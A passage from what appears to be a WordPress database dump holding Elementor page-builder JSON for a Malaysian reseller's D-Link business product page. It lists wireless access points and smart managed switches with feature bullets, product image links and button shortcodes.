]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7607,3415,'_elementor_version','2.5.14'),(7608,3415,'_elementor_edit_mode','builder'),(7612,3416,'_elementor_template_type','post'),(7613,3416,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" 